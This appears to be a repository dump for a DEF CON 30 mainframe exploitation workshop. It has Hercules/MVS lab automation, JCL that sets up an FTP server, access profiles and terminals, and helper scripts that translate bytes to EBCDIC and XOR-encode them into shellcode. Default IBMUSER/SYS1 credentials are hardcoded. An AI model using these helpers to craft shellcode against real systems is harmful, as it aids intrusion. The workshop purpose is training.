252 | ''' 253 | Reads stdout queue waiting for expected response, default is 254 | to check STDOUT queue, set stderr=True to check stderr queue instead 255 | default timeout is 30 minutes 256 | ''' 257 | time_started = time.time() 258 | 259 | if not timeout: 260 | timeout = TIMEOUT 261 | 262 | if not timeout and self.timeout: 263 | timeout=self.timeout 264 | 265 | print("[AUTOMATION] Waiting for string to appear in hercules log: {}".format(string_to_waitfor)) 266 | 267 | while True: 268 | if time.time() > time_started + timeout: 269 | exception = "Waiting for '{}' timed out after {} seconds".format(string_to_waitfor, timeout) 270 | print("[AUTOMATION] {}".format(exception)) 271 | raise Exception(exception) 272 | 273 | try: 274 | if stderr: 275 | line = self.stderr_q.get(False).strip() 276 | else: 277 | line = self.stdout_q.get(False).strip() 278 | while string_to_waitfor not in line: 279 | if stderr: 280 | line = self.stderr_q.get(False).strip() 281 | else: 282 | line = self.stdout_q.get(False).strip() 283 | continue 284 | return 285 | 286 | except queue.Empty: 287 | #print("Empty Queue") 288 | continue 289 | 290 | 291 | def ipl(self, step_text='', clpa=False,ftp=False): 292 | print(step_text) 293 | self.reset_hercules(clpa=clpa) 294 | #self.wait_for_string("0:0151 CKD") 295 | 296 | if clpa: 297 | self.send_herc("ipl 150") 298 | self.wait_for_string("HHC00010A Enter '/' input for console 0:0009") 299 | self.send_oper("r 0,clpa") 300 | # self.wait_for_string('$HASP426 SPECIFY OPTIONS - HASP-II, VERSION JES2 4.1') 301 | # self.send_oper('r 0,noreq') 302 | #IKT005I TCAS IS INITIALIZED 303 | if ftp: 304 | self.wait_for_string("FTP005I Startup Complete") 305 | else: 306 | self.wait_for_string("IKT005I TCAS IS INITIALIZED") 307 | 308 | def shutdown_mvs(self, cust=False): 309 | self.send_oper('$PJES2,ABEND') 310 | self.wait_for_string("00 $HASP098 ENTER TERMINATION OPTION") 311 | self.send_oper("r 00,PURGE") 312 | if cust: 313 | self.wait_for_string('IEF404I JES2 - ENDED - ') 314 | else: 315 | self.wait_for_string('IEF196I IEF285I VOL SER NOS= SPOOL0.') 316 | self.send_oper('z eod') 317 | self.wait_for_string('IEE334I HALT EOD SUCCESSFUL') 318 | self.send_oper('quiesce') 319 | self.wait_for_string("disabled wait state") 320 | self.send_herc('stop') 321 | 322 | def send_herc(self, command=''): 323 | ''' Sends hercules commands ''' 324 | print("[AUTOMATION] Sending Hercules Command: {}".format(command)) 325 | self.hercproc.stdin.write(command+"\n") 326 | self.hercproc.stdin.flush() 327 | 328 | def send_oper(self, command=''): 329 | ''' Sends operator/console commands (i.e. prepends /) ''' 330 | self.send_herc("/{}".format(command)) 331 | 332 | def send_reply(self, command=''): 333 | ''' Sends operator/console commands with automated number ''' 334 | self.send_herc("/r {},{}".format(reply_num,command)) 335 | 336 | def submit(self,jcl, host='127.0.0.1',port=3505, ebcdic=False): 337 | '''submits a job (in ASCII) to hercules listener''' 338 | 339 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 340 | 341 | try: 342 | # Connect to server and send data 343 | sock.connect((host, port)) 344 | if ebcdic: 345 | sock.send(jcl) 346 | else: 347 | sock.send(jcl.encode()) 348 | 349 | finally: 350 | sock.close() 351 | 352 | 353 | print("[AUTOMATION] Changing to MVS/CE Folder {}".format(args.mvsce)) 354 | os.chdir(args.mvsce) 355 | try: 356 | os.remove("punchcards/pch00d.txt") 357 | except: 358 | print("punchcards/pch00d.txt Already deleted") 359 | build = herc_automation() 360 | try: 361 | 362 | if args.initial: 363 | build.ipl(clpa=False) 364 | print("[AUTOMATION] Submitting {}/jcl/MACLFTPD.jcl".format(cwd)) 365 | with open("{}/jcl/MACLFTPD.jcl".format(cwd),"r") as jcl: 366 | build.submit(jcl.read()) 367 | build.wait_for_string("HASP250 MACLFTPD IS PURGED") 368 | build.check_maxcc("MACLFTPD") 369 | 370 | print("[AUTOMATION] Submitting {}/jcl/logon_screen.jcl".format(cwd)) 371 | with open("{}/jcl/logon_screen.jcl".format(cwd),"r") as jcl: 372 | build.submit(jcl.read()) 373 | build.wait_for_string("HASP250 AWESOME IS PURGED") 374 | build.check_maxcc("AWESOME") 375 | 376 | print("[AUTOMATION] Submitting {}/jcl/upload.jcl".format(cwd)) 377 | with open("{}/jcl/upload.jcl".format(cwd),"r") as jcl: 378 | build.submit(jcl.read()) 379 | build.wait_for_string("HASP250 UPLOAD IS PURGED") 380 | build.check_maxcc("UPLOAD") 381 | 382 | print("[AUTOMATION] Submitting {}/jcl/terminals.jcl".format(cwd)) 383 | with open("{}/jcl/terminals.jcl".format(cwd),"r") as jcl: 384 | build.submit(jcl.read()) 385 | build.wait_for_string("HASP250 TERMINAL IS PURGED") 386 | build.check_maxcc("TERMINAL") 387 | 388 | build.shutdown_mvs(cust=True) 389 | elif args.ftp: 390 | build.ipl(clpa=False,ftp=True) 391 | print("[AUTOMATION] FTP'ing OVERFLOW files") 392 | # build.wait_for_string("FTP005I Startup Complete") 393 | print("[AUTOMATION] Running command: for i in {}/overflows/*; do lftp -e \"cd DEFCON.OVERFLOW; put $i; bye\" -u ibmuser,sys1 localhost:2121; done".format(cwd)) 394 | p = os.system("for i in {}/overflows/*; do lftp -e \"cd DEFCON.OVERFLOW; put $i; bye\" -u ibmuser,sys1 localhost:2121; done".format(cwd)) 395 | print("Return code:{}".format(p)) 396 | if p != 0: 397 | print("[ERROR] Could not upload files to FTP") 398 | sys.exit(-1) 399 | print("[AUTOMATION] Running command: lftp -e \"cd DEFCON.OVERFLOW; put {}/ARBAUTH/PATTERN; bye\" -u ibmuser,sys1 localhost:2121".format(cwd)) 400 | p = os.system("lftp -e \"cd DEFCON.OVERFLOW.ARBAUTH; put {}/ARBAUTH/PATTERN; bye\" -u ibmuser,sys1 localhost:2121".format(cwd)) 401 | 402 | print("[AUTOMATION] Return code:{}".format(p)) 403 | if p != 0: 404 | print("[ERROR] Could not upload files to FTP") 405 | sys.exit(-1) 406 | 407 | build.shutdown_mvs(cust=True) 408 | 409 | elif args.users: 410 | 411 | build.ipl(clpa=True) 412 | p = Path("{}/users".format(cwd)).glob('**/*.ebcdic') 413 | files = [x for x in p if x.is_file()] 414 | for jcl_file in sorted(files): 415 | print("[AUTOMATION] Submitting {}".format(jcl_file)) 416 | 417 | with open(jcl_file,"rb") as jcl: 418 | build.submit(jcl.read(),port=3506,ebcdic=True) 419 | build.wait_for_string("HASP250 {} IS PURGED".format(jcl_file.stem.split('.')[0])) 420 | build.check_maxcc(jcl_file.stem.split('.')[0]) 421 | 422 | build.shutdown_mvs(cust=True) 423 | 424 | finally: 425 | build.quit_hercules() 426 | 427 | 428 | 429 | 430 | -------------------------------------------------------------------------------- /extra/FTPD.MVP: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/FTPD.MVP -------------------------------------------------------------------------------- /extra/Wallpapers/title.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/Wallpapers/title.jpg -------------------------------------------------------------------------------- /extra/Wallpapers/wallpaper.1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/Wallpapers/wallpaper.1.png -------------------------------------------------------------------------------- /extra/Wallpapers/wallpaper.2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/Wallpapers/wallpaper.2.png -------------------------------------------------------------------------------- /extra/Wallpapers/wallpaper.3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/Wallpapers/wallpaper.3.png -------------------------------------------------------------------------------- /extra/Wallpapers/youdidit.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/Wallpapers/youdidit.jpg -------------------------------------------------------------------------------- /extra/Wallpapers/youdidit2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/extra/Wallpapers/youdidit2.jpg -------------------------------------------------------------------------------- /extra/a2etable.py: -------------------------------------------------------------------------------- 1 | ebcdic = "010203372D2E2F16050B0C0D0E0F101112133C3D322618193F271C1D1E1F405A7F7B5B6C507D4D5D5C4E6B604B61F0F1F2F3F4F5F6F7F8F97A5E4C7E6E6F7CC1C2C3C4C5C6C7C8C9D1D2D3D4D5D6D7D8D9E2E3E4E5E6E7E8E9ADE0BD5F6D79818283848586878889919293949596979899A2A3A4A5A6A7A8A9C04FD0A107202122232425061728292A2B2C090A1B30311A333435360838393A3B04143EFF41AA4AB19FB26AB5BBB49A8AB0CAAFBC908FEAFABEA0B6B39DDA9B8BB7B8B9AB6465626663679E687471727378757677AC69EDEEEBEFECBF80FDFEFBFCBAAE594445424643479C4854515253585556578C49CDCECBCFCCE170DDDEDBDC8D8EDF" 2 | ascii = "0102030405060708090B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9FA0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEFF0F1F2F3F4F5F6F7F8F9FAFBFCFDFEFF" 3 | n = 2 4 | 5 | aline = [] 6 | eline = [] 7 | string = '' 8 | for i in range(0, len(ascii), n): 9 | aline.append(ascii[i:i+n]) 10 | eline.append(ebcdic[i:i+n]) 11 | 12 | print("ASCII Entries: {} EBCDIC Entries: {}".format(len(aline), len(eline))) 13 | l = 16 14 | 15 | for i in range(0,254,l): 16 | print("ascii : {}".format((' '.join(x for x in aline[i:i+l])))) 17 | print("ebcdic: {}\n".format((' '.join(x for x in eline[i:i+l])))) 18 | -------------------------------------------------------------------------------- /extra/e2alookup.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | ebcdic = "010203372D2E2F16050B0C0D0E0F101112133C3D322618193F271C1D1E1F405A7F7B5B6C507D4D5D5C4E6B604B61F0F1F2F3F4F5F6F7F8F97A5E4C7E6E6F7CC1C2C3C4C5C6C7C8C9D1D2D3D4D5D6D7D8D9E2E3E4E5E6E7E8E9ADE0BD5F6D79818283848586878889919293949596979899A2A3A4A5A6A7A8A9C04FD0A107202122232425061728292A2B2C090A1B30311A333435360838393A3B04143EFF41AA4AB19FB26AB5BBB49A8AB0CAAFBC908FEAFABEA0B6B39DDA9B8BB7B8B9AB6465626663679E687471727378757677AC69EDEEEBEFECBF80FDFEFBFCBAAE594445424643479C4854515253585556578C49CDCECBCFCCE170DDDEDBDC8D8EDF" 4 | ascii = "0102030405060708090B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9FA0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEFF0F1F2F3F4F5F6F7F8F9FAFBFCFDFEFF" 5 | n = 2 6 | 7 | aline = [] 8 | eline = [] 9 | string = '' 10 | for i in range(0, len(ascii), n): 11 | aline.append(ascii[i:i+n]) 12 | eline.append(ebcdic[i:i+n]) 13 | 14 | final_form = '' 15 | 16 | for arg in sys.argv[1:]: 17 | if arg in eline: 18 | l = eline.index(arg) 19 | print("{} --> {}".format(arg, aline[l])) 20 | final_form += aline[l] 21 | else: 22 | raise Exception("No translation found for {}".format(arg)) 23 | 24 | print("Final String: {}".format(final_form)) 25 | 26 | print("Writting bytes to shellcode.bin") 27 | open("shellcode.bin","wb").write(bytes.fromhex(final_form)) -------------------------------------------------------------------------------- /extra/findbytes.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | ebcdic = "010203372D2E2F16050B0C0D0E0F101112133C3D322618193F271C1D1E1F405A7F7B5B6C507D4D5D5C4E6B604B61F0F1F2F3F4F5F6F7F8F97A5E4C7E6E6F7CC1C2C3C4C5C6C7C8C9D1D2D3D4D5D6D7D8D9E2E3E4E5E6E7E8E9ADE0BD5F6D79818283848586878889919293949596979899A2A3A4A5A6A7A8A9C04FD0A107202122232425061728292A2B2C090A1B30311A333435360838393A3B04143EFF41AA4AB19FB26AB5BBB49A8AB0CAAFBC908FEAFABEA0B6B39DDA9B8BB7B8B9AB6465626663679E687471727378757677AC69EDEEEBEFECBF80FDFEFBFCBAAE594445424643479C4854515253585556578C49CDCECBCFCCE170DDDEDBDC8D8EDF" 4 | ascii = "0102030405060708090B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F808182838485868788898A8B8C8D8E8F909192939495969798999A9B9C9D9E9FA0A1A2A3A4A5A6A7A8A9AAABACADAEAFB0B1B2B3B4B5B6B7B8B9BABBBCBDBEBFC0C1C2C3C4C5C6C7C8C9CACBCCCDCECFD0D1D2D3D4D5D6D7D8D9DADBDCDDDEDFE0E1E2E3E4E5E6E7E8E9EAEBECEDEEEFF0F1F2F3F4F5F6F7F8F9FAFBFCFDFEFF" 5 | n = 2 6 | 7 | aline = [] 8 | eline = [] 9 | string = '' 10 | for i in range(0, len(ascii), n): 11 | aline.append(ascii[i:i+n]) 12 | eline.append(ebcdic[i:i+n]) 13 | 14 | final_form = '' 15 | xored = '' 16 | 17 | for arg in sys.argv[1:]: 18 | 19 | start = b'\x99' 20 | xord = int.from_bytes(start, byteorder="big") ^ int.from_bytes(bytes.fromhex(arg), byteorder="big") 21 | xstring = f'{xord:x}'.upper() 22 | if xstring in eline: 23 | print("{} ^ {} = {}".format(arg,start.hex(), xstring)) 24 | final_form += start.hex() 25 | xored += xstring 26 | else: 27 | print('ruhroh') 28 | 29 | print("Shellcode: {}\nXOR Key : {}".format(xored, final_form)) -------------------------------------------------------------------------------- /jcl/MACLFTPD.jcl: -------------------------------------------------------------------------------- 1 | //MACLFTPD JOB (TSO), 2 | // 'Install MACLIB', 3 | // CLASS=A, 4 | // MSGCLASS=A, 5 | // MSGLEVEL=(1,1), 6 | // USER=IBMUSER,PASSWORD=SYS1 7 | //* 8 | //* Update MVP 9 | //* 10 | //UPDATE EXEC PGM=IKJEFT01,REGION=8192K 11 | //SYSTSIN DD * 12 | FREE FILE(RXLIB) 13 | ALLOC FILE(RXLIB) DSN('BREXX.CURRENT.RXLIB') SHR 14 | FREE FILE(SYSEXEC) 15 | ALLOC FILE(SYSEXEC) DSN('SYS2.EXEC') SHR 16 | RX MVP UPDATE -D 17 | //SYSTSPRT DD SYSOUT=* 18 | //* 19 | //* Install SYS2.MACLIBS and the FTPD Server 20 | //* 21 | //MVPMCLB EXEC MVP,INSTALL='MACLIB -D' 22 | //MVPFTPD EXEC MVP,INSTALL='FTPD -D' 23 | //* 24 | //* Give all users access to FTPD 25 | //* 26 | //ADDRAKFP EXEC PGM=SORT,REGION=512K,PARM='MSG=AP' 27 | //STEPLIB DD DSN=SYSC.LINKLIB,DISP=SHR 28 | //SYSOUT DD SYSOUT=A 29 | //SYSPRINT DD SYSOUT=A 30 | //SORTLIB DD DSNAME=SYSC.SORTLIB,DISP=SHR 31 | //SORTOUT DD DSN=SYS1.SECURE.CNTL(PROFILES),DISP=SHR 32 | //SORTWK01 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW1 33 | //SORTWK02 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW2 34 | //SORTWK03 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW3 35 | //SORTWK04 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW5 36 | //SORTWK05 DD UNIT=2314,SPACE=(CYL,(5,5)),VOL=SER=SORTW6 37 | //SYSIN DD * 38 | SORT FIELDS=(1,80,CH,A) 39 | RECORD TYPE=F,LENGTH=(80) 40 | END 41 | /* 42 | //SORTIN DD DSN=SYS1.SECURE.CNTL(PROFILES),DISP=SHR 43 | // DD DATA,DLM=@@ 44 | FACILITYFTPAUTH USERS READ 45 | DATASET DEFCON.* READ 46 | DATASET WHITE.RABBIT NONE 47 | @@ 48 | //* 49 | //* Update the RAKF database 50 | //* 51 | //RAKFUPDT EXEC RAKFPROF 52 | //* 53 | //* Create custom FTPD procedure 54 | //* 55 | //FTPDPROC EXEC PGM=PDSLOAD 56 | //STEPLIB DD DSN=SYSC.LINKLIB,DISP=SHR 57 | //SYSPRINT DD SYSOUT=* 58 | //SYSUT2 DD DSN=SYS2.PROCLIB,DISP=SHR 59 | //SYSUT1 DD DATA,DLM=@@ 60 | ./ ADD NAME=FTPDDC30 61 | //FTPDDC30 PROC SRVPORT='2121',AUTHUSR='IBMUSER',SYSUDMP='A' 62 | //******************************************************************** 63 | //* 64 | //* MVS3.8J RAKF ENABLED FTP SERVER PROC WITH CUSTOM ARGUMENTS 65 | //* TO USE: IN HERCULES CONSOLE ISSUE 66 | //* /S FTPDPARM,SRVPORT=54321,SRVIP=10.10.10.10 67 | //* 68 | //******************************************************************** 69 | //FTPD EXEC PGM=FTPDXCTL,TIME=1440,REGION=4096K, 70 | // PARM='SRVPORT=&SRVPORT DD=AAINTRDR AUTHUSR=&AUTHUSR' 71 | //AAINTRDR DD SYSOUT=(A,INTRDR),DCB=(RECFM=FB,LRECL=80,BLKSIZE=80) 72 | //STDOUT DD SYSOUT=* 73 | //SYSUDUMP DD SYSOUT=&SYSUDMP 74 | @@ 75 | -------------------------------------------------------------------------------- /jcl/terminals.jcl: -------------------------------------------------------------------------------- 1 | //TERMINAL JOB (TSO), 2 | // 'DC30 MVSCE', 3 | // CLASS=A, 4 | // MSGCLASS=A, 5 | // MSGLEVEL=(1,1), 6 | // USER=IBMUSER,PASSWORD=SYS1 7 | //* 8 | //* Add the extra terminals needed 9 | //* 10 | //* MAKE SURE YOU ALSO INCREASE USERS IN SYS1.PAMRLIB(IKJTSO00) 11 | //STORE EXEC PGM=IEBUPDTE,REGION=1024K,PARM=NEW 12 | //SYSPRINT DD SYSOUT=* 13 | //SYSUT2 DD DSN=SYS1.VTAMLST,DISP=SHR 14 | //* The changes below are based on the KICKS 251 KookBooks 15 | //* http://www.kicksfortso.com/same/KooKbooK/KooKbooK-251project.htm 16 | //* 2. VTAM must know about the terminals. 17 | //SYSIN DD * 18 | ./ ADD NAME=ATCCON00,LIST=ALL 19 | APPLTSO, TSO APPLS X 20 | DC30T LOCAL 3270S 21 | ./ ADD NAME=DC30T,LIST=ALL 22 | LCL400 LBUILD SUBAREA=2 23 | CUU400 LOCAL TERM=3277,CUADDR=400,ISTATUS=ACTIVE, + 24 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 25 | FEATUR2=(MODEL2,PFK) 26 | CUU401 LOCAL TERM=3277,CUADDR=401,ISTATUS=ACTIVE, + 27 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 28 | FEATUR2=(MODEL2,PFK) 29 | CUU402 LOCAL TERM=3277,CUADDR=402,ISTATUS=ACTIVE, + 30 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 31 | FEATUR2=(MODEL2,PFK) 32 | CUU403 LOCAL TERM=3277,CUADDR=403,ISTATUS=ACTIVE, + 33 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 34 | FEATUR2=(MODEL2,PFK) 35 | CUU404 LOCAL TERM=3277,CUADDR=404,ISTATUS=ACTIVE, + 36 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 37 | FEATUR2=(MODEL2,PFK) 38 | CUU405 LOCAL TERM=3277,CUADDR=405,ISTATUS=ACTIVE, + 39 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 40 | FEATUR2=(MODEL2,PFK) 41 | CUU406 LOCAL TERM=3277,CUADDR=406,ISTATUS=ACTIVE, + 42 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 43 | FEATUR2=(MODEL2,PFK) 44 | CUU407 LOCAL TERM=3277,CUADDR=407,ISTATUS=ACTIVE, + 45 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 46 | FEATUR2=(MODEL2,PFK) 47 | CUU408 LOCAL TERM=3277,CUADDR=408,ISTATUS=ACTIVE, + 48 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 49 | FEATUR2=(MODEL2,PFK) 50 | CUU409 LOCAL TERM=3277,CUADDR=409,ISTATUS=ACTIVE, + 51 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 52 | FEATUR2=(MODEL2,PFK) 53 | CUU40A LOCAL TERM=3277,CUADDR=40A,ISTATUS=ACTIVE, + 54 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 55 | FEATUR2=(MODEL2,PFK) 56 | CUU40B LOCAL TERM=3277,CUADDR=40B,ISTATUS=ACTIVE, + 57 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 58 | FEATUR2=(MODEL2,PFK) 59 | CUU40C LOCAL TERM=3277,CUADDR=40C,ISTATUS=ACTIVE, + 60 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 61 | FEATUR2=(MODEL2,PFK) 62 | CUU40D LOCAL TERM=3277,CUADDR=40D,ISTATUS=ACTIVE, + 63 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 64 | FEATUR2=(MODEL2,PFK) 65 | CUU40E LOCAL TERM=3277,CUADDR=40E,ISTATUS=ACTIVE, + 66 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 67 | FEATUR2=(MODEL2,PFK) 68 | CUU40F LOCAL TERM=3277,CUADDR=40F,ISTATUS=ACTIVE, + 69 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 70 | FEATUR2=(MODEL2,PFK) 71 | CUU410 LOCAL TERM=3277,CUADDR=410,ISTATUS=ACTIVE, + 72 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 73 | FEATUR2=(MODEL2,PFK) 74 | CUU411 LOCAL TERM=3277,CUADDR=411,ISTATUS=ACTIVE, + 75 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 76 | FEATUR2=(MODEL2,PFK) 77 | CUU412 LOCAL TERM=3277,CUADDR=412,ISTATUS=ACTIVE, + 78 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 79 | FEATUR2=(MODEL2,PFK) 80 | CUU413 LOCAL TERM=3277,CUADDR=413,ISTATUS=ACTIVE, + 81 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 82 | FEATUR2=(MODEL2,PFK) 83 | CUU414 LOCAL TERM=3277,CUADDR=414,ISTATUS=ACTIVE, + 84 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 85 | FEATUR2=(MODEL2,PFK) 86 | CUU415 LOCAL TERM=3277,CUADDR=415,ISTATUS=ACTIVE, + 87 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 88 | FEATUR2=(MODEL2,PFK) 89 | CUU416 LOCAL TERM=3277,CUADDR=416,ISTATUS=ACTIVE, + 90 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 91 | FEATUR2=(MODEL2,PFK) 92 | CUU417 LOCAL TERM=3277,CUADDR=417,ISTATUS=ACTIVE, + 93 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 94 | FEATUR2=(MODEL2,PFK) 95 | CUU418 LOCAL TERM=3277,CUADDR=418,ISTATUS=ACTIVE, + 96 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 97 | FEATUR2=(MODEL2,PFK) 98 | CUU419 LOCAL TERM=3277,CUADDR=419,ISTATUS=ACTIVE, + 99 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 100 | FEATUR2=(MODEL2,PFK) 101 | CUU41A LOCAL TERM=3277,CUADDR=41A,ISTATUS=ACTIVE, + 102 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 103 | FEATUR2=(MODEL2,PFK) 104 | CUU41B LOCAL TERM=3277,CUADDR=41B,ISTATUS=ACTIVE, + 105 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 106 | FEATUR2=(MODEL2,PFK) 107 | CUU41C LOCAL TERM=3277,CUADDR=41C,ISTATUS=ACTIVE, + 108 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 109 | FEATUR2=(MODEL2,PFK) 110 | CUU41D LOCAL TERM=3277,CUADDR=41D,ISTATUS=ACTIVE, + 111 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 112 | FEATUR2=(MODEL2,PFK) 113 | CUU41E LOCAL TERM=3277,CUADDR=41E,ISTATUS=ACTIVE, + 114 | LOGTAB=LOGTAB01,LOGAPPL=NETSOL, + 115 | FEATUR2=(MODEL2,PFK) 116 | ./ ADD NAME=APPLTSO,LIST=ALL 117 | TSO APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 118 | TSO0001 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 119 | TSO0002 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 120 | TSO0003 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 121 | TSO0004 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 122 | TSO0005 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 123 | TSO0006 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 124 | TSO0007 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 125 | TSO0008 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 126 | TSO0009 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 127 | TSO0010 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 128 | TSO0011 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 129 | TSO0012 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 130 | TSO0013 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 131 | TSO0014 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 132 | TSO0015 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 133 | TSO0016 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 134 | TSO0017 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 135 | TSO0018 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 136 | TSO0019 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 137 | TSO0020 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 138 | TSO0021 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 139 | TSO0022 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 140 | TSO0023 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 141 | TSO0024 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 142 | TSO0025 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 143 | TSO0026 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 144 | TSO0027 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 145 | TSO0028 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 146 | TSO0029 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 147 | TSO0030 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 148 | TSO0031 APPL AUTH=(PASS,NVPACE,TSO),BUFFACT=5 149 | ./ ADD NAME=ATCSTR00,LIST=ALL 150 | CONFIG=00, /*CONFIG LIST SUFFIX */+ 151 | SSCPID=01, /*THIS VTAMS ID IN NETWORK */+ 152 | NETSOL=YES, /*NETWORK SOLICITOR OPTION */+ 153 | MAXSUBA=31, /*MAXIMUM SUBAREAS IN NETWORK */+ 154 | NOPROMPT, /*OPERATOR PROMPT OPTION */+ 155 | SUPP=NOSUP, /*MESSAGE SUPPRESSION OPTION */+ 156 | COLD, /*RESTART OPTION - COLD/WARM */+ 157 | APBUF=(192,,128), /*ACE STORAGE POOL */+ 158 | CRPLBUF=(281,,181), /*RPL COPY POOL */+ 159 | IOBUF=(128,512,104,F), /*FIXED IO (GP-5/2009) */+ 160 | LFBUF=(32,,32,F), /*LARGE FIXED BUFFER POOL */+ 161 | LPBUF=(146,,146), /*LARGE PAGEBLE BUFFER POOL */+ 162 | NPBUF=(134,,70,F), /*NON WS FMCB */+ 163 | PPBUF=(20,3992,10,F), /*PAGEBLE IO (GP-5/2009) */+ 164 | SFBUF=(140,,76,F), /*SMALL FIXED BUFFER POOL */+ 165 | SPBUF=(032,,32,F), /*SMALL PGBL BUFFER POOL */+ 166 | UECBUF=(128,,108,F), /*USER EXIT CB */+ 167 | WPBUF=(64,,64,F) /*MESSAGE CONTROL BUFFER POOL */ 168 | /* 169 | //* 170 | //* 